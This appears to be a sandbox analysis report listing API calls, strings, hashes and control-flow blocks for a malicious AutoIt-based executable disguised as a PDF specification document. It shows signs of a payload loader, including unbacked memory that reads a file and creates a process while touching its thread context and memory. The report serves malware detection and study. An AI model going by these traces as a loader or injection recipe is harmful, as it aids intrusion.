                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8f4786460929e380cfd05bc590e49aeefb9e9be0bce2a36194ea2b8a4c400ac0
                                      • Instruction ID: 7982f89b94e7034394e6b2e5c34623501d5caa7140e586dab9b9983684c98c2d
                                      • Opcode Fuzzy Hash: 8f4786460929e380cfd05bc590e49aeefb9e9be0bce2a36194ea2b8a4c400ac0
                                      • Instruction Fuzzy Hash: D3325874A04241DFDB23CF68E840BBD7BB1AF46314F29C16AE955AF29AC7709C41CB60
                                      APIs
                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00375F2D
                                      • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00375F47
                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00375F6A
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00375F7C
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00376342
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0037636E
                                        • Part of subcall function 0036EA9C: CloseHandle.KERNELBASE(00000000,003EEEF4,00000000,?,00376041,003EEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0036EAEC
                                        • Part of subcall function 0036EA9C: GetLastError.KERNEL32(?,00376041,003EEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0036EAF6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ErrorLast$CloseHandle$FileType
                                      • String ID: @
                                      • API String ID: 604914513-2766056989
                                      • Opcode ID: 9977dbb998d532c17ad273c24f4c408783e4c30a52a5b3e353a1c0751ca39520
                                      • Instruction ID: 83fb7e285a1d91a72dae130cf0d9d13f7ebb1b6d9a090252230ef11ab5754a0c
                                      • Opcode Fuzzy Hash: 9977dbb998d532c17ad273c24f4c408783e4c30a52a5b3e353a1c0751ca39520
                                      • Instruction Fuzzy Hash: 6D224771904A059FEB3B9F68CC56BBD7B61EB14314F25C228E519AB2D2C37D8D40CB91

                                      Control-flow Graph

                                      • Graph rendering not reproduced; basic blocks 38bfa4-38c393, with CopyFileW labelled at 38c342-38c356
                                      APIs
                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0038C2A1
                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0038C338
                                      • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0038C34E
                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0038C35F
                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0038C371
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: File$Delete$Copy
                                      • String ID: p1Kw`KLw
                                      • API String ID: 3226157194-1011832795
                                      • Opcode ID: 6eb0aafd265052c9627ba9bac05517b7c6f9af0b39ffc9fe82b2541ad4b2ee0e
                                      • Instruction ID: d475434a2d69d191c6974367186c10fbd553942a8890b3995645e6773e26bd41
                                      • Opcode Fuzzy Hash: 6eb0aafd265052c9627ba9bac05517b7c6f9af0b39ffc9fe82b2541ad4b2ee0e
                                      • Instruction Fuzzy Hash: CAC10AB1910219AFDF12EF95CC85EDEB7BDAF49310F1080A6F609EA151DB70AA448F61

                                      Control-flow Graph

                                      • Graph rendering not reproduced; basic blocks 20e25d0-20e28d2 in the region at 020E0000 that is not backed by a PE, with calls to CreateFileW, VirtualAlloc, ReadFile, CloseHandle and VirtualFree
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 020E26A1
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 020E28C7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6130076775.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20e0000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CreateFileFreeVirtual
                                      • String ID:
                                      • API String ID: 204039940-0
                                      • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                      • Instruction ID: 6f68da8eaab5066426618bc78d248b13a2b082eb8d1fab38e4256b9b403aab0e
                                      • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                      • Instruction Fuzzy Hash: 72A1F574E01209EFDF14CFA4C995BEEBBB9BF48304F208159E512BB280D7759A81DB54

                                      Control-flow Graph

                                      • Graph rendering not reproduced; basic blocks 3449fb-344a2f and 3b41cc-3b424f, with calls to RegOpenKeyExW, RegQueryValueExW and RegCloseKey
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00344A1D
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003B41DB
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003B421A
                                      • RegCloseKey.ADVAPI32(?), ref: 003B4249
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: QueryValue$CloseOpen
                                      • String ID: Include$Software\AutoIt v3\AutoIt
                                      • API String ID: 1586453840-614718249
                                      • Opcode ID: 08bfb66b85a6b29ed4ff1a7896cb4d3cfb899b70bce90a1d76887788181691cf
                                      • Instruction ID: 83aecc328673749cf21872a1dcdedc84091510207cd45b0767f8a64b1e0595bd
                                      • Opcode Fuzzy Hash: 08bfb66b85a6b29ed4ff1a7896cb4d3cfb899b70bce90a1d76887788181691cf
                                      • Instruction Fuzzy Hash: 30113071600118BEDB06ABA8DD86DEF7BBCEF04344F104465F506DB1A1EA70AE029750

                                      Control-flow Graph
                                      • Block 1277: 3436b8-343728 (CreateWindowExW x2, ShowWindow x2)
                                      APIs
                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003436E6
                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00343707
                                      • ShowWindow.USER32(00000000,?,?,?,?,00343AA3,?), ref: 0034371B
                                      • ShowWindow.USER32(00000000,?,?,?,?,00343AA3,?), ref: 00343724
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$CreateShow
                                      • String ID: AutoIt v3$edit
                                      • API String ID: 1584632944-3779509399
                                      • Opcode ID: da2d54dc00111232066e91e77f11d65441b8cdcab9fab127442291f42032d7fa
                                      • Instruction ID: 4469ade2387670fb44cd185170a343d3c8fc81b2b1fa9add48383e17fba4a829
                                      • Opcode Fuzzy Hash: da2d54dc00111232066e91e77f11d65441b8cdcab9fab127442291f42032d7fa
                                      • Instruction Fuzzy Hash: 29F03A755402D07AE7325B57AD88E673EBDD7C6F20F01802FBA04A22B0C5711891CAB4

                                      Control-flow Graph
                                      • Block 1382: 20e23b0-20e24cf (call 20e0000, call 20e22a0, CreateFileW)
                                      • Block 1389: 20e24d6-20e24e6
                                      • Block 1390: 20e24d1
                                      • Block 1391: 20e2586-20e258b
                                      • Block 1393: 20e24ed-20e2507 (VirtualAlloc)
                                      • Block 1394: 20e24e8
                                      • Block 1395: 20e250b-20e2522 (ReadFile)
                                      • Block 1396: 20e2509
                                      • Block 1397: 20e2526-20e2560 (call 20e22e0, call 20e12a0)
                                      • Block 1398: 20e2524
                                      • Block 1403: 20e257c-20e2584 (ExitProcess)
                                      • Block 1404: 20e2562-20e2577 (call 20e2330)
                                      • Edges: 1382->1389, 1382->1390, 1389->1393, 1389->1394, 1390->1391, 1393->1395, 1393->1396, 1394->1391, 1395->1397, 1395->1398, 1396->1391, 1397->1403, 1397->1404, 1398->1391, 1403->1391, 1404->1403
                                      APIs
                                        • Part of subcall function 020E22A0: Sleep.KERNELBASE(000001F4), ref: 020E22B1
                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 020E24C5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6130076775.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20e0000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CreateFileSleep
                                      • String ID: ENMGDWYS3HUAY
                                      • API String ID: 2694422964-3732406215
                                      • Opcode ID: 594f6e6ae480bfa0264789d13bf927a2107544a31228aa9261d6ca896fde7626
                                      • Instruction ID: 2d4552e55f839a0dfe06df12571db50b07411bfbd380be1bffcbdc18d90d45b5
                                      • Opcode Fuzzy Hash: 594f6e6ae480bfa0264789d13bf927a2107544a31228aa9261d6ca896fde7626
                                      • Instruction Fuzzy Hash: B9515D71D14249EFEF15DBE4D814BEEBB79AF48300F004199A609BB2C0D7B91B84DBA5

                                      Control-flow Graph
                                      • Block 1406: 375b20-375b2e (call 367f0c)
                                      • Block 1409: 375b52
                                      • Block 1410: 375b30-375b4b (GetModuleHandleW, GetProcAddress)
                                      • Block 1411: 375b55-375b5f (call 367f0c)
                                      • Block 1412: 375b4d-375b50
                                      • Block 1413: 375bae-375bb0
                                      • Block 1416: 375b93-375ba8 (CreateFileW)
                                      • Block 1417: 375b61-375b91
                                      • Edges: 1406->1409, 1406->1410, 1409->1411, 1410->1411, 1410->1412, 1411->1416, 1411->1417, 1412->1413, 1416->1413, 1417->1413
                                      APIs
                                      • GetModuleHandleW.KERNEL32(kernel32.dll,CreateFile2,00000001,0000000C,00000001,?,00000001,?,00000000,00000109), ref: 00375B3A
                                      • GetProcAddress.KERNEL32(00000000), ref: 00375B41
                                      • CreateFileW.KERNELBASE(00000000,?,00000001,?,00000001,00000001,00000000,00000001,0000000C,00000001,?,00000001,?,00000000,00000109), ref: 00375BA8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressCreateFileHandleModuleProc
                                      • String ID: CreateFile2$kernel32.dll
                                      • API String ID: 2580138172-1988006178
                                      • Opcode ID: 9e6f349b6bd94d7a64c739f271599f7157a2b3a9d5a7bd1a231e083a53b442cb
                                      • Instruction ID: c48538faf0116b8fc35ce79dd4dd88af40a5f85d8662159a7c0b0c755a3dce3c
                                      • Opcode Fuzzy Hash: 9e6f349b6bd94d7a64c739f271599f7157a2b3a9d5a7bd1a231e083a53b442cb
                                      • Instruction Fuzzy Hash: 2E111572800609AFCF129FA4CC05EEE7BB8FF08315F018125FD14A6291C7B5DA209BA0

                                      Control-flow Graph
                                      • Block 1419: 35d298-35d2a3
                                      • Block 1420: 35d315-35d317
                                      • Block 1421: 35d2a5-35d2aa
                                      • Block 1422: 35d2ac-35d2c4 (RegOpenKeyExW)
                                      • Block 1423: 35d308-35d30b
                                      • Block 1424: 35d2c6-35d2e5 (RegQueryValueExW)
                                      • Block 1425: 35d2e7-35d2f2
                                      • Block 1426: 35d2fc-35d307 (RegCloseKey)
                                      • Block 1427: 35d2f4-35d2f6
                                      • Block 1428: 35d30c-35d313
                                      • Block 1429: 35d2fa
                                      • Edges: 1419->1420, 1419->1421, 1420->1423, 1421->1420, 1421->1422, 1422->1420, 1422->1424, 1424->1425, 1424->1426, 1425->1427, 1425->1428, 1426->1423, 1427->1429, 1428->1429, 1429->1426
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0035D28B,SwapMouseButtons,00000004,?), ref: 0035D2BC
                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0035D28B,SwapMouseButtons,00000004,?,?,?,?,0035C865), ref: 0035D2DD
                                      • RegCloseKey.KERNELBASE(00000000,?,?,0035D28B,SwapMouseButtons,00000004,?,?,?,?,0035C865), ref: 0035D2FF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID: Control Panel\Mouse
                                      • API String ID: 3677997916-824357125
                                      • Opcode ID: ba6e5d4a136d9b8687ea29f43678c03c5c36aee03cc4c78f65bd600d5eca40e9
                                      • Instruction ID: 2ee3512c4fb750e0c9108746c56847c638bb119390db28d8d5db5799f1802c5c
                                      • Opcode Fuzzy Hash: ba6e5d4a136d9b8687ea29f43678c03c5c36aee03cc4c78f65bd600d5eca40e9
                                      • Instruction Fuzzy Hash: 29117979611219BFDB228FA8DC84EAF7BBCEF04741F004829F805D7120E731AE489B60
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 020E1A5B
                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 020E1AF1
                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 020E1B13
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6130076775.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20e0000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                      • String ID:
                                      • API String ID: 2438371351-0
                                      • Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                      • Instruction ID: 7a317663eab1f08c02530529501710987538e88bdc731a6cb0d1a1f47858152c
                                      • Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                      • Instruction Fuzzy Hash: 1F620B30A14258DBEB24DFA4C850BEEB376EF58304F1091A9D10DEB390E7B59E81DB59
                                      APIs
                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00345293
                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003B3CB0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: IconLoadNotifyShell_String
                                      • String ID: Line:
                                      • API String ID: 3363329723-1585850449
                                      • Opcode ID: 8df8fae9919ea6e8b2b94db8f139fe9f7c94e719babaf1c2673307f1c54009c2
                                      • Instruction ID: 4ce7a2ffc5b10728cf9f00f109d9a9511545c1d086971db48a7ec0670739cd50
                                      • Opcode Fuzzy Hash: 8df8fae9919ea6e8b2b94db8f139fe9f7c94e719babaf1c2673307f1c54009c2
                                      • Instruction Fuzzy Hash: 7F31A1718087446FD726EB60DC42FDE77DCAB45310F00492EF5859E4A2EB74B648CB96
                                      APIs
                                      • GetOpenFileNameW.COMDLG32 ref: 003B376F
                                        • Part of subcall function 0034660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003453B1,?,?,003461FF,?,00000000,00000001,00000000), ref: 0034662F
                                        • Part of subcall function 003440A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003440C6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Name$Path$FileFullLongOpen
                                      • String ID: X$t3?
                                      • API String ID: 779396738-4041524223
                                      • Opcode ID: ad7d4cf360d84ef97ec4d2d0dfab70388fe4c85106e1112613bf26b2f7e874bb
                                      • Instruction ID: 971075d06acaf7fd3536dbcb2df73869b777bf38af95bcb0f1022e3102a71a6a
                                      • Opcode Fuzzy Hash: ad7d4cf360d84ef97ec4d2d0dfab70388fe4c85106e1112613bf26b2f7e874bb
                                      • Instruction Fuzzy Hash: 142169719101989BDB03DF94D8457EE77F99F49304F004069E505AF241DBB466898F55
                                      APIs
                                      • GetTempPathW.KERNEL32(00000104,?), ref: 0038C72F
                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0038C746
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Temp$FileNamePath
                                      • String ID: aut
                                      • API String ID: 3285503233-3010740371
                                      • Opcode ID: 9fd211739ccf890eff1d87fdc4e7d462b4dbb15ba63fc78e57e47d4af462a3f4
                                      • Instruction ID: 3b3475a50070049f25676c854ee988d28d726909ee2bb0c94c65df92f8999031
                                      • Opcode Fuzzy Hash: 9fd211739ccf890eff1d87fdc4e7d462b4dbb15ba63fc78e57e47d4af462a3f4
                                      • Instruction Fuzzy Hash: 54D05E7150030EABDB11AB90DC0EFDAB76C9700704F0005A0B750E50B1DBB0E6998B54
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 943955addbbebd53b95bdfea7404ce69eabdb2637f08ab481ba40ae713f8e2d7
                                      • Instruction ID: 62b399aeb6fecf95f0107ebcbceb751ec997694a31534d9c3115669836e480b3
                                      • Opcode Fuzzy Hash: 943955addbbebd53b95bdfea7404ce69eabdb2637f08ab481ba40ae713f8e2d7
                                      • Instruction Fuzzy Hash: 25F159716083019FCB11DF24C885B6AB7E5FF89314F14896EF9959B292DB70E905CB82
                                      APIs
                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0038C385,?,?,?,?,?,00000004), ref: 0038C6F2
                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0038C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0038C708
                                      • CloseHandle.KERNEL32(00000000,?,0038C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0038C70F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateHandleTime
                                      • String ID:
                                      • API String ID: 3397143404-0
                                      • Opcode ID: ec7727896eaf8f7f6615a0a5ab60311ea783dbd9f388507e25067169f7074e99
                                      • Instruction ID: 44b237fbc18a97c9cdbda25d4e3d5f24d687ff6df216fbf4fac2b0e6a77f7841
                                      • Opcode Fuzzy Hash: ec7727896eaf8f7f6615a0a5ab60311ea783dbd9f388507e25067169f7074e99
                                      • Instruction Fuzzy Hash: F4E08632140214BBD7222B54AC0EFCA7B1CAB45760F144120FB54A90E097B135118798
                                      APIs
                                        • Part of subcall function 003422A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,003424F1), ref: 00342303
                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003425A1
                                      • CoInitialize.OLE32(00000000), ref: 00342618
                                      • CloseHandle.KERNEL32(00000000), ref: 003B503A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Handle$CloseInitializeMessageRegisterWindow
                                      • String ID:
                                      • API String ID: 3815369404-0
                                      • Opcode ID: e28c2f2c97e8ca8b3bb955d357b825a650d764e687eb05b768247ac801ca5e90
                                      • Instruction ID: 6afaa12977dfd032274a04c6acdb1018f320e2126454851369db03f8b697351a
                                      • Opcode Fuzzy Hash: e28c2f2c97e8ca8b3bb955d357b825a650d764e687eb05b768247ac801ca5e90
                                      • Instruction Fuzzy Hash: F071AEB49013858BD30AEF6AAE90855BBE4FB9934479041BEE50AFB7B2CB745404CF1D
                                      APIs
                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 003450CB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
